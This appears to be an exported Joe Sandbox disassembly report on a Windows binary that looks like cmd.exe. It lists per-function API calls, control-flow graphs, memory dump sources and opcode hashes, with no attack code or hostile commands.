                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 2624720099-1920437939
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 4b892bcacf7056bc7a33056b5d9312e2c34e159c59401c98ff40f4847366f85d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e0d6314462040d9132af36def7bdcbd46fb0756625f4788b6d15f19097c8c1f5
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 54C1AD32F0864B8AF750BB6094542BCFAA1FF49754FD4417AE90F866B6DFBCA4418720
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D152823C Relevance: 15.1, APIs: 10, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1118 7ff7d152823c-7ff7d152829b FindFirstFileExW 1119 7ff7d15282cd-7ff7d15282df 1118->1119 1120 7ff7d152829d-7ff7d15282a9 GetLastError 1118->1120 1124 7ff7d1528365-7ff7d152837b FindNextFileW 1119->1124 1125 7ff7d15282e5-7ff7d15282ee 1119->1125 1121 7ff7d15282af 1120->1121 1122 7ff7d15282b1-7ff7d15282cb 1121->1122 1126 7ff7d152837d-7ff7d1528380 1124->1126 1127 7ff7d15283d0-7ff7d15283e5 FindClose 1124->1127 1128 7ff7d15282f1-7ff7d15282f4 1125->1128 1126->1119 1129 7ff7d1528386 1126->1129 1127->1128 1130 7ff7d1528329-7ff7d152832b 1128->1130 1131 7ff7d15282f6-7ff7d1528300 1128->1131 1129->1120 1130->1121 1132 7ff7d152832d 1130->1132 1133 7ff7d1528332-7ff7d1528353 GetProcessHeap HeapAlloc 1131->1133 1134 7ff7d1528302-7ff7d152830e 1131->1134 1132->1120 1135 7ff7d1528356-7ff7d1528363 1133->1135 1136 7ff7d152838b-7ff7d15283c2 GetProcessHeap HeapReAlloc 1134->1136 1137 7ff7d1528310-7ff7d1528313 1134->1137 1135->1137 1138 7ff7d15350f8-7ff7d153511e GetLastError FindClose 1136->1138 1139 7ff7d15283c8-7ff7d15283ce 1136->1139 1140 7ff7d1528327 1137->1140 1141 7ff7d1528315-7ff7d1528323 1137->1141 1138->1122 1139->1135 1140->1130 1141->1140
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ErrorFileFindFirstLast
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 873889042-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 27c65da7f8d538de6f121bbd0d71dcc46de16a60aaae5e6e09062b1dca0debcd
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A511532A09B4B86F700AF51A85417DBBA0FB5AB91BD48172DA5F43770CFBCE4548A20
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1522978 Relevance: 9.1, APIs: 6, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 1142 7ff7d1522978-7ff7d15229b6 1143 7ff7d15229b9-7ff7d15229c1 1142->1143 1143->1143 1144 7ff7d15229c3-7ff7d15229c5 1143->1144 1145 7ff7d15229cb-7ff7d15229cf 1144->1145 1146 7ff7d152e441 1144->1146 1147 7ff7d15229d2-7ff7d15229da 1145->1147 1148 7ff7d15229dc-7ff7d15229e1 1147->1148 1149 7ff7d1522a1e-7ff7d1522a3e FindFirstFileW 1147->1149 1148->1149 1150 7ff7d15229e3-7ff7d15229eb 1148->1150 1151 7ff7d152e435-7ff7d152e439 1149->1151 1152 7ff7d1522a44-7ff7d1522a5c FindClose 1149->1152 1150->1147 1155 7ff7d15229ed-7ff7d1522a1c call 7ff7d1528f80 1150->1155 1151->1146 1153 7ff7d1522a62-7ff7d1522a6e 1152->1153 1154 7ff7d1522ae3-7ff7d1522ae5 1152->1154 1156 7ff7d1522a70-7ff7d1522a78 1153->1156 1157 7ff7d152e3f7-7ff7d152e3ff 1154->1157 1158 7ff7d1522aeb-7ff7d1522b10 _wcsnicmp 1154->1158 1156->1156 1160 7ff7d1522a7a-7ff7d1522a8d 1156->1160 1158->1153 1161 7ff7d1522b16-7ff7d152e3f1 _wcsicmp 1158->1161 1160->1146 1163 7ff7d1522a93-7ff7d1522a97 1160->1163 1161->1153 1161->1157 1165 7ff7d1522a9d-7ff7d1522ade memmove call 7ff7d15213e0 1163->1165 1166 7ff7d152e404-7ff7d152e407 1163->1166 1165->1150 1168 7ff7d152e40b-7ff7d152e413 1166->1168 1168->1168 1170 7ff7d152e415-7ff7d152e42b memmove 1168->1170 1170->1151
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 0a000e2b9965f392e216a52b0a9aba1fc1a738f94547f6155f6b8c51109368fb
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8751E562B0868B85FB30AB1595442BEE290FB54BE0FD44272DE6F876F0DFBCE4418210
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D15293B0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 092ce4a5c4121f18bac830377546ce69030fc0735eaf62e2392c65e45dbaf61f
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EBB09214E2541BD1E704BB219C820A852A06B68710FD01472C00F80270DEAC919BC710
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1524D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        control_flow_graph 643 7ff7d1524d5c-7ff7d1524e4b InitializeCriticalSection call 7ff7d15258e4 SetConsoleCtrlHandler _get_osfhandle GetConsoleMode _get_osfhandle GetConsoleMode call 7ff7d1520580 call 7ff7d1524a14 call 7ff7d1524ad0 call 7ff7d1525554 GetCommandLineW 654 7ff7d1524e4d-7ff7d1524e54 643->654 654->654 655 7ff7d1524e56-7ff7d1524e61 654->655 656 7ff7d1524e67-7ff7d1524e7b call 7ff7d1522e44 655->656 657 7ff7d15251cf-7ff7d15251e3 call 7ff7d1513278 call 7ff7d1524c1c 655->657 662 7ff7d15251ba-7ff7d15251ce call 7ff7d1513278 call 7ff7d1524c1c 656->662 663 7ff7d1524e81-7ff7d1524ec3 GetCommandLineW call 7ff7d15213e0 call 7ff7d151ca40 656->663 662->657 663->662 674 7ff7d1524ec9-7ff7d1524ee8 call 7ff7d152417c call 7ff7d1522394 663->674 678 7ff7d1524eed-7ff7d1524ef5 674->678 678->678 679 7ff7d1524ef7-7ff7d1524f1f call 7ff7d151aa54 678->679 682 7ff7d1524f21-7ff7d1524f30 679->682 683 7ff7d1524f95-7ff7d1524fee GetConsoleOutputCP GetCPInfo call 7ff7d15251ec GetProcessHeap HeapAlloc 679->683 682->683 684 7ff7d1524f32-7ff7d1524f39 682->684 689 7ff7d1524ff0-7ff7d1525006 GetConsoleTitleW 683->689 690 7ff7d1525012-7ff7d1525018 683->690 684->683 686 7ff7d1524f3b-7ff7d1524f77 call 7ff7d1513278 GetWindowsDirectoryW 684->686 695 7ff7d1524f7d-7ff7d1524f90 call 7ff7d1523c24 686->695 696 7ff7d15251b1-7ff7d15251b9 call 7ff7d1524c1c 686->696 689->690 692 7ff7d1525008-7ff7d152500f 689->692 693 7ff7d152507a-7ff7d152507e 690->693 694 7ff7d152501a-7ff7d1525024 call 7ff7d1523578 690->694 692->690 697 7ff7d15250eb-7ff7d1525161 GetModuleHandleW GetProcAddress * 3 693->697 698 7ff7d1525080-7ff7d15250b3 call 7ff7d153b89c call 7ff7d151586c call 7ff7d1513240 call 7ff7d1523448 693->698 694->693 706 7ff7d1525026-7ff7d1525030 694->706 695->683 696->662 704 7ff7d152516f 697->704 705 7ff7d1525163-7ff7d1525167 697->705 724 7ff7d15250d2-7ff7d15250d7 call 7ff7d1513278 698->724 725 7ff7d15250b5-7ff7d15250d0 call 7ff7d1523448 * 2 698->725 710 7ff7d1525172-7ff7d15251af free call 7ff7d1528f80 704->710 705->704 709 7ff7d1525169-7ff7d152516d 705->709 711 7ff7d1525032-7ff7d1525059 GetStdHandle GetConsoleScreenBufferInfo 706->711 712 7ff7d1525075 call 7ff7d153cff0 706->712 709->704 709->710 715 7ff7d1525069-7ff7d1525073 711->715 716 7ff7d152505b-7ff7d1525067 711->716 712->693 715->693 715->712 716->693 729 7ff7d15250dc-7ff7d15250e6 GlobalFree 724->729 725->729 729->697
                                                                                                                                                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                        • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524D9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D15258E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7D153C6DB), ref: 00007FF7D15258EF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524DBB
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1524DCA
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524DE0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF7D1524DEE
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524E04
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D1520589
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: SetConsoleMode.KERNELBASE ref: 00007FF7D152059E
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D15205AF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: GetConsoleMode.KERNELBASE ref: 00007FF7D15205C5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D15205EF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: GetConsoleMode.KERNELBASE ref: 00007FF7D1520605
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: _get_osfhandle.MSVCRT ref: 00007FF7D1520632
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1520580: SetConsoleMode.KERNELBASE ref: 00007FF7D1520647
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A28
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A66
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: memmove.MSVCRT(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7D15249F1), ref: 00007FF7D1524AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AD6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1524AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7D1518798), ref: 00007FF7D1524AEF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7D1524E35), ref: 00007FF7D15255DA
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D1525623
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D1525667
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D15256BE
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1525554: RegQueryValueExW.KERNELBASE ref: 00007FF7D1525702
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524E35
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524E81
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524F69
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524F95
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FB0
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FD8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1524FF8
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1525037
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D152504B
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D15250DF
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D15250F2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D152510F
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1525130
                                                                                                                                                                                                                                                                                                                                                                                                                                        • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D152514A
                                                                                                                                                                                                                                                                                                                                                                                                                                        • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7D1525175
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: _get_osfhandle.MSVCRT ref: 00007FF7D1523584
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D152359C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235C3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235D9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D15235ED
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Part of subcall function 00007FF7D1523578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7D15132E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7D1523602
                                                                                                                                                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.1265032008.00007FF7D1511000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7D1510000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265007653.00007FF7D1510000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265076724.00007FF7D1542000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D154D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D1551000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265119184.00007FF7D155F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.1265193351.00007FF7D1569000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff7d1510000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                                                                                                                                                                                                                                                                                                                                                                                                                        • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                                                                                                                                                                                                                                                                                                                                                                                                                        • API String ID: 1049357271-3021193919
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode ID: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction ID: 5c24d3ad9e99063f81465f73adbbd424b272087df19e895f3499b647153850e2
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09109df7b1f92dd6c706f13a256821a2299fbe80603d920afefa709af37ce98d
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 12C16B62A18A4B86FB04BB11E8141BDF7A1FF89B91FD48176D94F433B1DFBCA4458260
                                                                                                                                                                                                                                                                                                                                                                                                                                        Function 00007FF7D1523C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                        • Not Executed
